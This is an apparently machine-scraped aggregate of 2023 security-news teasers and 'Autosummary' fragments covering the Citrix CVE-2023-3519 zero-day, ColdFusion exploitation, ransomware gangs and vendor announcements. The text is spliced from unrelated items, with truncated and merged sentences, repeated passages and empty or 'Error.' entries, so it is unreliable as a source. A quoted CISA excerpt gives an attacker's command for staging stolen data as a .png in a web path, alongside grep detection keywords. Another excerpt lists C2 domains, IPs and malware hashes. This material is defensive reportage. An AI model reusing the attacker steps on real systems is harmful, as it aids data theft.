The increase in the DDoS attack volume in the H1 of 2023 There has been a significant increase in the power and volume of DDoS attacks over the last two years: In 2021, the capacity of DDoS attacks was up to 300 Gbps. "The exploitation of the Citrix NetScaler ADC zero-day vulnerability (CVE-2023-3519) was first spotted by a critical infrastructure organization, who reported it to the Cybersecurity and Infrastructure Security Agency (CISA). “In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The … More
The post Citrix ADC zero-day exploitatation: CISA releases details about attack on CI organization (CVE-2023-3519) appeared first on Help Net Security.
"Autosummary:
In-the-wild exploitation of CVE-2023-3519 Greynoise has created a tag to show in-the-wild probing of internet-facing NetScaler ADC platforms and Gateways with authentication attempts through CVE-2023-3519, but so far there have been no detections. "Autosummary:
They did SMB scanning on the subnet and used the webshell to check and exfiltrate Active Directory inventory, with a particular interest in: NetScaler configuration files that contain an encrypted password whose key is on the ADC appliance NetScaler decryption keys, which can unlock the AD password in the configuration file The list of users, systems, groups, subnets, organizational units, contacts, partitions, and trusts in the Active Directory The attacker encrypted the discovery data using the OpenSSL library and readied it for exfiltration to a web-accessible location in compressed form as a tarball disguised as a PNG image. The backdoor enabled the attacker to discover active directory (AD) objects, which include users, groups, applications, and devices on the network, as well as steal AD data. "Autosummary:
The archive file, when unpacked, contains an executable file ("GoogleAI.exe"), which is the .NET single-file, self-contained application ("GoogleAI.exe") that, in turn, incorporates a DLL file ("GoogleAI.dll"), whose responsibility is to fetch a password-protected ZIP archive from Google Drive. "Autosummary:
In addition to several offices closing, many services remained offline for some time, including Oak311, Parking Citation Assistance Center, Business Tax Licenses, and Permitting.As most local governments maintain a small IT staff, there is potential for shared passwords, reused credentials, and a lack of multi-factor authentication security, exposing vulnerabilities for a breach. "Autosummary:
They did SMB scanning on the subnet and used the webshell to check and exfiltrate Active Directory inventory, with a particular interest in: NetScaler configuration files that contain an encrypted password whose key is on the ADC appliance NetScaler decryption keys, which can unlock the AD password in the configuration file The list of users, systems, groups, subnets, organizational units, contacts, partitions, and trusts in the Active Directory The attacker encrypted the discovery data using the OpenSSL library and readied it for exfiltration to a web-accessible location in compressed form as a tarball disguised as a PNG image. The backdoor enabled the attacker to enumerate active directory (AD) objects, which include users, groups, applications, and devices on the network, as well as steal AD data. "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Seifreed, @BleepinComputer, @malwrhunterteam, @billtoulas, @Ionut_Ilascu, @struppigel, @fwosar, @LawrenceAbrams, @serghei, @chainalysis, @TrendMicro, @Intel_by_KELA, @pcrisk, @SophosXOps, @coveware, @BroadcomSW, @pcrisk, and @azalsecurity. In other ransomware reports from BleepingComputer and cybersecurity firms: Finally, Clop"s data theft attacks using the MOVEit Transfer zero-day continue to be a hot topic in the news, with companies continuing to disclose data breaches as they are added to the gang"s data leak site. "Categories: Exploits and vulnerabilities Categories: News Tags: Citrix Tags: NetScaler Tags: CVE-2023-3519 Tags: web shell A critical unauthenticated remote code execution vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway is being actively exploited |
The post CISA: You"ve got two weeks to patch Citrix NetScaler vulnerability CVE-2023-3519 appeared first on Malwarebytes Labs.
"Autosummary:
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities: NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13 NetScaler ADC 13.1-FIPS before 13.1-37.159 NetScaler ADC 12.1-FIPS before 12.1-55.297 NetScaler ADC 12.1-NDcPP before 12.1-55.297 Citrix notes that NetScaler ADC and NetScaler Gateway version 12.1 have reached the end-of-life stage and customers should upgrade to a newer variant of the product. "Categories: Business Tags: Estée Lauder Tags: Cl0p Tags: BlackCat Tags: ransomware Tags: compromise Tags: attack Tags: breach Tags: blackmail Tags: threat We take a look at reports of cosmetics firm Estée Lauder being attacked by the Cl0p and BlackCat ransomware groups. |
The post Estée Lauder targeted by Cl0p and BlackCat ransomware groups appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Regular readers will know that these attacks typically target confidential information, company secrets, personal data, payroll, and identity scans. Supposedly, the information taken could “impact customers, employees, and suppliers”. "Do you know where your patients’ data lives once it’s in the cloud? Unfortunately, for many healthcare organizations, the answer is no – or, at least, it’s not a definitive yes. Knowing how (or where) data is used, shared or stored is essential to ensuring organizational security and patient privacy. Yet, as digital transformation makes data more “liquid”, it’s becoming a larger challenge. Here’s why data travel is the next big cybersecurity challenge — and … More
The post Why data travel is healthcare’s next big cybersecurity challenge appeared first on Help Net Security.
"Autosummary:
Strategies for managing data travel Here are a few of the most important strategies organizations can utilize to effectively manage and monitor data travel: Data mapping : To gain a comprehensive view of how data moves within and outside your organization, data mapping is key. : Encrypting your data, whether it’s in transit or at rest, provides an additional layer of security, ensuring that even if data falls into the wrong hands, it remains unreadable without the correct decryption key. "In this Help Net Security video, Greg Woolf, CEO at FiVerity, discusses how the emergence of sophisticated fraud tools powered by AI and recent upheavals in the banking sector have forged an ideal environment for financial fraud. This complex scenario presents considerable obstacles for financial establishments to defend themselves efficiently. In light of this, key industry participants such as financial bodies, data providers, and governmental entities have identified a collaborative approach as the best defense … More
The post A fresh look at the current state of financial fraud appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Over the coming months, we will include access to wider cloud security logs for our worldwide customers at no additional cost," Vasu Jakkal, corporate vice president of security, compliance, identity, and management at Microsoft, said. "Autosummary:
"Adobe released an emergency update to address critical vulnerabilities in ColdFusion, including an actively exploited zero-day. Adobe released an out-of-band update to address critical and moderate vulnerabilities in ColdFusion, including a zero-day flaw that is actively exploited in attacks. The vulnerabilities could lead to arbitrary code execution and security feature bypass. The impacted ColdFusion versions are 2023, 2021 […]
The post Adobe out-of-band update addresses an actively exploited ColdFusion zero-day appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Adobe) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Below is the list of the issues addressed by the software firm with this out-of-band update: Vulnerability Category Vulnerability Impact Severity CVSS base score CVSS vector CVE Numbers Deserialization of Untrusted Data (CWE-502) Arbitrary code execution Critical 9.8 CVSS:3.1/AV:N/AC: "Autosummary:
Win32.MeatBall MD5 FFF248DB8066AE3D30274996BAEDDAB6 (oleacc.dll) C2 IP/URL freetranslatecenter[.]com help.freetranslatecenter[.]com onlinenewscentral[.]com onlinemapservices[.]com search.onlinemapservices[.]com help.onlinemapservices[.]com apps.onlinemapservices[.]com edit.onlinemapservices[.]com booking-onlines[.]com 81.28.13[.]74 92.38.160[.]142 92.38.188[.]135 92.38.190[.]55 103.221.222[.]133 193.109.78[.]243 193.124.112[.]206 194.87.95[.]125 Implant using Yandex Cloud as C2 MD5 A05D6D7A6A1E9669FC4C61223DA3953F (dbghelp.dll) 2F5C889A819CFE0804005F7CE5FD956E (vmService.pkg) Appendix II – MITRE ATT&CK Mapping The table below contains all the TTPs identified in the analysis of the activity described in this report. Variants of FourteenHi MD5 7332710D10B26A5970C5A1DDF7C83FBA (mpsvc.dll) 2A1CFA6D17627EAAA7A63F73038A93DA (taskhost.doc) BB02A5D3E8807D7B13BE46AD478F7FBB (cclib.dll) 22E66E0BE712F2843D8DB22060088751 (ToastUI.exe.png) D75C7BD965C168D693CE8294138136AE (ToastUI.exe.dat) C2 IP/URL sfb.odk-saturn[.]com/dialin/login 87.121.52[.]86 Backdoor.They accept a relatively long list of commands, including: upload arbitrary files, download arbitrary files, run arbitrary commands, set communication delay, start reverse shell, terminate own process and remove persistence. Strings found in a sample which uses Yandex Disk Log containing the result of command execution using cmd Conclusion The tendency to abuse cloud services (e.g., Dropbox, Yandex, Google, etc.) is not new, but it continues to expand, because it is hard to restrict / mitigate in cases when an organization’s business processes depend on using such services. The entire stack of implants used in attacks can be divided into three categories based on their roles: First-stage implants for persistent remote access and initial data gathering Second-stage implants for gathering data and files, including from air-gapped systems Third-stage implants and tools used to upload data to C2 In this article (which is the first part of the report) we analyze common TTPs of first-stage implants used by threat actors to establish a persistent remote access channel into the infrastructure of industrial organizations. Computer name User name IP address MAC address OS version Path to %System% To upload the data collected to C2, the implant sends a request using an embedded API token to create a directory with a name that is unique to the victim host. "Autosummary:
This hacking group has been active for over a decade, since at least 2009, and is known for attacks against high-profile targets worldwide, including banks, government agencies, and media organizations. "Autosummary:
For instance, CVE-2022-0543 exploits have been used for initial access by other botnets targeting Redis instances, including Muhstik and Redigo, for various malicious purposes, including DDoS and brute-forcing attacks. "Autosummary:
Image We"re all familiar with tech support scams - where the unwary are tricked into granting remote access to their computers by fraudsters, in the belief that the "tech support person" will fix a non-existent "problem" (such as a "virus infection") or make a refund after claiming that there has been fraudulent activity detected on an account. "Impinj released the Impinj M800 series RAIN RFID tag chips to meet enterprise needs for item connectivity in global IoT deployments. The new M800 series delivers readability in enterprise deployments and offers enhanced tag reliability and manufacturability. The new chips demonstrate Impinj’s ongoing commitment to increase the speed, distance, and reliability at which a RAIN RFID system can discover, engage, and protect connected items. “Today, we have taken another big step toward our mission to … More
The post Impinj M800 series RAIN RFID tag chips advance item connectivity for enterprise IoT deployments appeared first on Help Net Security.
"Autosummary:
Improving tag readability, reliability, and manufacturability The Impinj M800 series, comprising the M830 and M850 tag chips, sets new performance benchmarks while improving features of the Impinj M700 series: Improved tag readability. "Autosummary:
Affected vendors include the likes of AMD, Asus, ARM, Dell EMC, Gigabyte, Lenovo, Nvidia, Qualcomm, Hewlett-Packard Enterprise, Huawei, Ampere Computing, ASRock, and more. "Autosummary:
Error. "Autosummary:
The binary, for its part, attempts to stop and remove SQL-related services, delete volume shadow copies, clear system event logs, terminate security-related processes, and bypass Raccine, an open-source tool designed to counter ransomware attacks, prior to commencing its encryption process, after which a ransom note is dropped in every directory. "Autosummary:
SentinelOne, in its latest analysis, said 144.217.92[.]197, an IP address linked to the JumpCloud attack, resolves to npmaudit[.]com, one of the eight domains listed by GitHub as used to fetch the second-stage malware. "The American cosmetics giant company Estée Lauder was hacked by two distinct ransomware groups, the ALPHV/BlackCat and Clop gangs. Yesterday the cybersecurity expert @sonoclaudio first alerted me about a strange circumstance, two ransomware actors, ALPHV/BlackCat and Clop, claim to have hacked the cosmetics giant company Estée Lauder and added the company to their Tor leak […]
The post ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder appeared first on Security Affairs.
"Autosummary:
Even if the company did not share details about the attack, it is likely that the Clop ransomware group has breached its network by exploiting the MoVEit Transfer zero-day vulnerability Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.
The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.
This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.
Download the PDF version of this report:
Autosummary:
Citrix released a patch on July 18, 2023.[1] CVE-2023-3519 CVE-2023-3519 is an unauthenticated RCE vulnerability affecting the following versions of NetScaler ADC and NetScaler Gateway:[1] NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13 NetScaler ADC and NetScaler Gateway version 12.1, now end of life NetScaler ADC 13.1-FIPS before 13.1-37.159 NetScaler ADC 12.1-FIPS before 12.1-65.36 NetScaler ADC 12.1-NDcPP before 12.65.36 The affected appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication, authorization, and auditing (AAA) virtual server for exploitation.[1] CISA added CVE-2023-3519 to its Known Exploited Vulnerabilities Catalog on July 19, 2023.Review NetScaler ADC internal logs ( sh.log* , bash.log* ) for traces of potential malicious activity (some example keywords for grep are provided below): database.php ns_gui/vpn /flash/nsconfig/keys/updated LDAPTLS_REQCERT ldapsearch openssl + salt Review NetScaler ADC internal access logs ( httpaccess-vpn.log* ) for 200 successful access of unknown web resources.ls -l {} \; Check http error logs for abnormalities that may be from initial exploit: grep "\.sh" /var/log/httperror.log* grep "\.php" /var/log/httperror.log* Check shell logs for unusual post-ex commands, for example: grep "/flash/nsconfig/keys" /var/log/sh.log* Look for setuid binaries dropped: find /varSUMMARY The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway.Exfiltrated collected data by uploading as an image file [T1036.008] to a web-accessible path [T1074]: cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png .The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of information technology (IT) and operational technology (OT) security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs.The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of information technology (IT) and operational technology (OT) security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs.The threat actors uploaded data as an image file to a web-accessible path: cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png . REFERENCES [1] Citrix Security Bulletin CTX561482: Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467The actors deleted the authorization configuration file ( /etc/auth.conf )—likely to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI) Overview In July 2023, a critical infrastructure organization reported to CISA that threat actors may have exploited a zero-day vulnerability in NetScaler ADC to implant a webshell on their non-production NetScaler ADC appliance. "Autosummary:
"In January, law enforcement officials disrupted the operations of the Hive cybercriminal group, which profited off a ransomware-as-a-service (RaaS) business model. Hive is widely believed to be affiliated with the Conti ransomware group, joining a list of other groups associated with former Conti operators, including Royal, Black Basta, and Quantum. RaaS affiliates are all over the globe, and so are their victims. These affiliates use a myriad of different tactics and techniques. In this article, … More
The post Trends in ransomware-as-a-service and cryptocurrency to monitor appeared first on Help Net Security.
"Autosummary:
Hive’s modus operandi Hive, like other RaaS providers, wrote a ransomware encryptor, created a dark web domain, advertised their services to affiliates and forums, and then allowed users to purchase a license (for their services) to configure a ransomware payload and receive extortion funds. You would need to implement a policy to ensure MFA is on any authentication to your network (a zero-trust network, ideally), multi-factor license(s) if you don’t have them, email security and phishing training solutions, and a patch management system with comprehensive asset management behind it. For example, Hive affiliates have been known to breach organizations using Remote Desktop Protocol (RDP) without multi-factor authentication (MFA), stolen credentials, phishing campaigns, and software vulnerabilities. "Data breaches have been hitting the headlines left and right. Every time a breach occurs, the impacted organization’s response differs from the last. In this Help Net Security video, Rodman Ramezanian, Global Cloud Threat Lead at Skyhigh Security, discusses what we should do – and not do – in the wake of a data breach.
The post What to do (and what not to do) after a data breach appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" The move builds on U.S. actions in November 2021, when the U.S. government added Israeli companies NSO Group and Candiru to the Entity List for developing software to target government officials, journalists, businesspeople, activists, academics, and embassy workers. "Autosummary:
"Autosummary:
"The FBI is warning the public of a recent nationwide uptick in technical support scams targeting older adults, where scammers instruct victims to send cash, wrapped in a magazine(s), via shipping companies," the FBI cautioned in a public service announcement issued through the Internet Crime Complaint Center (IC3). "Small and medium-sized businesses (SMBs) are targeted by cyberattackers as much as large companies, the 2023 Verizon Data Breach Investigations Report (DBIR) has revealed; here are some cybersecurity controls they should prioritize. Company size does not matter to cyber attackers SMBs often underestimate their appeal as a potential target. They assume they are “little fish” not worth the attackers’ effort and that their data holds little value. But that’s not true: their systems store sensitive … More
The post Cybersecurity measures SMBs should implement appeared first on Help Net Security.
"Autosummary:
Once essential cyber hygiene is achieved with those and after a company begins moving closer to the larger end of the SMB scale and has more resources available, it’s time to add other security controls: Incident response management – Establish and sustain an incident response program for prompt attack response – Establish and sustain an incident response program for prompt attack response Application software security – Identify and address vulnerabilities in internally developed, hosted, or acquired software to prevent potential harm to the company – Identify and address vulnerabilities in internally developed, hosted, or acquired software to prevent potential harm to the company Penetration testing – Test the efficacy and resilience of enterprise assets and implemented controls by simulating attackers’ actions “Now that you’ve already looked at the Controls and prioritized them, you know what you’re most likely to be hit with and you’re working your way through to the end—your ducks are almost all in a row. "The Biden-Harris Administration has announced a cybersecurity certification and labeling program to help Americans more easily choose smart devices that are safer and less vulnerable to cyberattacks. The new “U.S. Cyber Trust Mark” program proposed by FCC Chairwoman Jessica Rosenworcel would raise the bar for cybersecurity across common devices, including smart refrigerators, smart microwaves, smart televisions, smart climate control systems, smart fitness trackers, and more. Several major electronics, appliance, and consumer product manufacturers, retailers, and … More
The post U.S. Cyber Trust Mark labeling program raises the bar for smart devices’ cybersecurity appeared first on Help Net Security.
"Autosummary:
Participants in this announcement include: Amazon, Best Buy, Carnegie Mellon University, CyLab, Cisco Systems, Connectivity Standards Alliance, Consumer Reports, Consumer Technology Association, Google, Infineon, the Information Technology Industry Council, IoXT, KeySight, LG Electronics U.S.A., Logitech, OpenPolicy, Qorvo, Qualcomm, Samsung Electronics, UL Solutions, Yale and August U.S. "Citrix has patched three vulnerabilities (CVE-2023-3519, CVE-2023-3466, CVE-2023-3467) in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway), one of which is a zero-day being exploited by attackers. A zero-day patched (CVE-2023-3519) CVE-2023-3519 is a remote code execution (RCE) vulnerability that could allow an unauthenticated threat actor to execute arbitrary code on a vulnerable server. At this time there is no public PoC, but the vulnerability has been observed being exploited in the … More
The post Citrix NetScaler zero-day exploited in the wild, patch is available (CVE-2023-3519) appeared first on Help Net Security.
"Autosummary:
The company noted that the following supported versions of NetScaler ADC and NetScaler Gateway are affected by the three patched vulnerabilities: NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13 NetScaler ADC 13.1-FIPS before 13.1-37.159 NetScaler ADC 12.1-FIPS before 12.1-55.297 NetScaler ADC 12.1-NDcPP before 12.1-55.297 Fixes have been provided for all these versions including the later releases. "Citrix is warning customers of an actively exploited critical vulnerability in NetScaler Application Delivery Controller (ADC) and Gateway. Citrix is warning customers of a critical vulnerability, tracked as CVE-2023-3519 (CVSS score: 9.8), in NetScaler Application Delivery Controller (ADC) and Gateway that is being actively exploited in the wild. The vulnerability Tracked as CVE-2023-3519 (CVSS score: 9.8), the vulnerability is […]
The post Citrix warns of actively exploited zero-day in ADC and Gateway appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"The U.S. government added surveillance technology vendors Cytrox and Intellexa to an economic blocklist for trafficking in cyber exploits. The Commerce Department’s Bureau of Industry and Security (BIS) added surveillance technology vendors Intellexa and Cytrox to the Entity List for trafficking in cyber exploits used to gain access to information systems. The Entity List maintained […]
The post US Gov adds surveillance firms Cytrox and Intellexa to Entity List for trafficking in cyber exploits appeared first on Security Affairs.
"Autosummary:
According to Google, the exploits were included in Cytrox’s commercial surveillance spyware that is sold to different nation-state actors, including Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain, and Indonesia. "Autosummary:
"Feedzai introduced Railgun, its next-generation AI engine designed to target and intercept financial fraud before it can occur. In order to scale, today’s risk engines force financial institutions to limit the data they use to make risk decisions – typically by looking only at a limited history of data, and by using only a subset of relevant data inputs. Railgun removes these constraints, so financial institutions can now use a complete history of all relevant … More
The post Feedzai Railgun protects customers against financial crime appeared first on Help Net Security.
"Autosummary:
Feedzai invests heavily in basic research, and in the last three years has created nearly 100 patents and pending patents in the US and Europe, covering innovations in a wide variety of areas including applied AI and machine learning, fraud detection, streaming data processing and analytics, money laundering detection, rules management, and AI explainability and fairness. "ExtraHop launched ExtraHop IDS for Government to help agencies accelerate zero trust ahead of the 2024 deadline. As agencies look to implement a zero trust architecture ahead of the 2024 deadline, they are racing to enhance visibility into their IT environments so they can verify that all users, devices, and systems are in alignment with the framework. However, the growing move to decentralize IT infrastructure has added new challenges for already resource-strapped government organizations, increasing … More
The post ExtraHop IDS for Government identifies malicious activity within encrypted traffic appeared first on Help Net Security.
"Autosummary:
“After two decades in the federal sector as a user, cybersecurity executive, and technology project manager, I can personally attest to the rapidly growing need for cybersecurity solutions that government organizations can trust to detect and reveal attacks in real-time,” said Mark Bowling, Chief Information Security and Risk Officer (CISRO), ExtraHop. "Autosummary:
"Autosummary:
This malware is a cyberespionage tool that allows the threat actors to launch javascript on the device, steal data from event logs, steal information about systems files, and steal authentication tokens, cookies, and credentials from a wide variety of programs, including browsers, FTP clients, VPN software, KeePass, Azure, AWS, and Outlook. "Autosummary:
In the SEC filing, the company informs that the focus is “on remediation, including efforts to restore impacted systems and services” and that the “incident has caused, and is expected to continue to cause, disruption to parts of the Company’s business operations.” "Categories: Personal Tags: plane Tags: ticket Tags: holiday Tags: flight Tags: airplane Tags: aeroplane Tags: scam Tags: phish Tags: phishing Tags: social engineering We take a look at several scams targeting flyers off on their holidays, and how you can keep yourself safe. |
The post Plane sailing for ticket scammers: How to keep your flight plans safe appeared first on Malwarebytes Labs.
"Autosummary:
The rest are a combination of “temporarily restricted” accounts, accounts set to private (and so not visible to non-followers), private individuals, video game themed(!), and more. If you’re revealing your name, frequent flyer number, and passport information online then you’re a possible meal ticket for scammers. "Categories: News Tags: Microsoft. MSA Tags: OWA Tags: validation token Tags: signing key Tags: Storm-0556 Tags: GetAccessTokensForResource Due to a validation error in Microsoft code, a suspected Chinese attacker was able to access user email from approximately 25 organizations, including government agencies. |
The post Microsoft validation error allowed state actor to access user email of government agencies and others appeared first on Malwarebytes Labs.
"Autosummary:
An authentication token allows internet users to access applications, services, websites, and application programming interfaces (APIs) without having to enter their login credentials each time they visit.Posted: July 19, 2023 by Due to a validation error in Microsoft code, a suspected Chinese attacker was able to access user email from approximately 25 organizations, including government agencies. "Autosummary:
"In an era where cyber threats continue to evolve, healthcare organizations are increasingly targeted by malicious actors employing multiple attack vectors, according to Trustwave. In its new research, Trustwave SpiderLabs has documented the attack flow utilized by threat groups, shedding light on their tactics, techniques, and procedures. From phishing emails to exploiting known vulnerabilities and compromising third-party vendors, these persistent threats pose significant risks to the healthcare industry. Healthcare industry bears heavier financial burden While … More
The post Healthcare organizations in the crosshairs of cyberattackers appeared first on Help Net Security.
"Autosummary:
Threat actors and threat tactics Threat actors: LockBit 3.0 ALPHV/BlackCat Clop DMA Locker Royal Babuk Magniber Black Basta RansomHouse Threat tactics: “Protecting the supply chain and maintaining business continuity are critical considerations across most industries, but healthcare cyber leaders encounter distinct challenges in safeguarding patient well-being, maintaining quality of care, and enabling healthcare professionals to leverage cutting-edge digital technologies to perform at the highest level,” said Trustwave CISO Kory Daniels. "Autosummary:
The adversary "gained unauthorized access to our systems to target a small and specific set of our customers," Bob Phan, chief information security officer (CISO) at JumpCloud, said in a post-mortem report. "Autosummary:
Those not using these protections can add the following process names to the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key as values of type REG_DWORD with data 1 to remove the attack vector: Excel.exe, Graph.exe, MSAccess.exe, MSPub.exe, PowerPoint.exe, Visio.exe, WinProj.exe, WinWord.exe, Wordpad.exe. "Autosummary:
"The C++-based Sardonic backdoor has the ability to harvest system information and execute commands, and has a plugin system designed to load and execute additional malware payloads delivered as DLLs," Symantec said in a report shared with The Hacker News. "Autosummary:
"Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023," Wordfence security researcher Ram Gall said in a Monday post. "Software firm JumpCloud announced it was the victim of a sophisticated cyber attack carried out by a nation-state actor. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless and secure manner. It allows IT administrators to centralize and simplify their identity and access management tasks across […]
The post JumpCloud revealed it was hit by a sophisticated attack by a nation-state actor appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Tracked as FIN8 (aka Syssphinx), this threat actor has been actively operating since at least January 2016, focusing on targeting industries such as retail, restaurants, hospitality, healthcare, and entertainment. "Autosummary:
Build vulnerability kill chain (Orca Security) After Orca Security reported the issue, the Google Security Team implemented a partial fix revoking the logging.privateLogEntries.list permission from the default Cloud Build Service Account, unrelated to Artifact Registry. "Attackers are exploiting two Adobe ColdFusion vulnerabilities (CVE-2023-29298, CVE-2023-38203) to breach servers and install web shells to enable persistent access and allow remote control of the system, according to Rapid7 researchers. Flaws with incomplete fixes On July 11, 2023, Adobe released security updates for ColdFusion versions 2023, 2021 and 2018 containing fixes for three vulnerabilities: CVE-2023-29298, a critical improper access control flaw that could allow attackers to bypass a security feature (reported by Rapid7’s Stephen … More
The post Adobe ColdFusion vulnerabilities exploited to deliver web shells (CVE-2023-29298, CVE-2023-38203) appeared first on Help Net Security.
"Autosummary:
Flaws with incomplete fixes On July 11, 2023, Adobe released security updates for ColdFusion versions 2023, 2021 and 2018 containing fixes for three vulnerabilities: CVE-2023-29298, a critical improper access control flaw that could allow attackers to bypass a security feature (reported by Rapid7’s Stephen Fewer) CVE-2023-29300, a deserialization of untrusted data that could be exploited for arbitrary code execution (reported by Crowdstrike’s Nicolas Zilio) CVE-2023-29301, another security feature bypass vulnerability (reported by Brian Reilly) At the time, there was no indication that any of them were being exploited in the wild. "Aiming to protect the digital ecosystem in the UAE and the Mena region, Seed Group, has announced a strategic partnership with Resecurity. With this strategic partnership, Seed Group and Resecurity are set to reshape the cybersecurity landscape in the Middle East, empowering organisations with advanced tools and techniques to proactively combat emerging threats in an increasingly digital world. The collaboration between Seed Group and Resecurity aims to equip regional businesses with the latest cybersecurity solutions, … More
The post Seed Group and Resecurity collaborate to reshape Middle East’s cybersecurity landscape appeared first on Help Net Security.
"Autosummary:
"Egress launched adaptive security for its Intelligent Email Security platform, providing dynamic and automated protection against advanced inbound and outbound threats, transforming the way in which organizations manage human risk on email. Egress CEO Tony Pepper comments: “Almost every organization freely admits that people represent the biggest risk to their security and are most vulnerable when using email. By implementing an adaptive security architecture, we can continually assess human risk on a per user basis … More
The post Egress defends users against phishing threats with adaptive security capability appeared first on Help Net Security.
"Autosummary:
The benefits of this approach include: Inbound and outbound email security : As adaptive security takes a proactive approach to managing human risk, Egress’ innovation will empower organizations to automatically adjust their email security controls in the areas that need it most. "Autosummary:
Telerik.Windows.Data.Validation.dll is a valid applaunch.exe file signed by Microsoft, which is vulnerable to DLL side-loading and is used to sideload mscoree.dll that, in turn, loads mscoree.dll.dat, the ShadowPad payload. "Autosummary:
What should companies do to protect employees and critical assets from the unintended risks posed by ChatGPT? Click here to read more Pro-Russian hacktivists attack Microsoft platforms, threaten European banking system A highly active pro-Russian hacktivist group knocked offline multiple Microsoft platforms, demanding US$1M dollars to halt the attacks, echoing the collective"s strategy in a recent Distributed-Denial-of-Service (DDoS) incident targeting Scandinavian Airlines.Ultimately, threat actors could leverage CVE-2023-20887 to access networks and inject malicious commands into Aria Operations for Networks, which could lead to data theft, data corruption, or even complete system compromise. "Autosummary:
"Autosummary:
In a security bulletin today, Citrix says that “exploits of CVE-2023-3519 on unmitigated appliances have been observed” and strongly advises its customers to switch to an updated version that fixes the issue: NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases NetScaler ADC and NetScaler Gateway 13.0-91.13 and later releases of 13.0 NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP The company notes that NetScaler ADC and NetScaler Gateway version 12.1 have reached the end-of-life stage and customers should upgrade to a newer variant of the product. "Spectro Cloud announces new Palette VerteX Edition and new Spectro Cloud Government practice to meet the growing need for powerful management and security for Kubernetes (K8s) in the public sector. Kubernetes adoption is growing across the public sector, from federal and defense to state and local government. Public sector organizations are looking to K8s and the open-source, cloud-native ecosystem around it to help drive IT agility in pursuit of their mission. But IT and platform … More
The post Spectro Cloud brings Kubernetes management to government organizations with Palette VerteX appeared first on Help Net Security.
"Autosummary:
“Palette VerteX is designed from the ground up with security in mind that permeates every aspect it touches, giving government IT, platform engineering, and security teams the confidence they need to deploy and manage any Kubernetes environment at scale,” said Matthew Appler, CEO, Corsec Security. Government organizations can leverage their existing investments while charting a course for modern Kubernetes, with openness as a core design principle in Palette VerteX. “The Palette VerteX announcement comes at a pivotal time in the public sector where managing Kubernetes across organizations using multiple cluster types, across multiple cloud and on-prem environments is very much a challenging reality,” said Josh Slattery, VP of Technology Sales at Vertosoft. "Autosummary:
"Autosummary:
Files encrypted by the SophosEncrypt Source: BleepingComputer In each folder that a file is encrypted, the ransomware will create a ransom note named information.hta, which is automatically launched when the encryption is finished. "Autosummary:
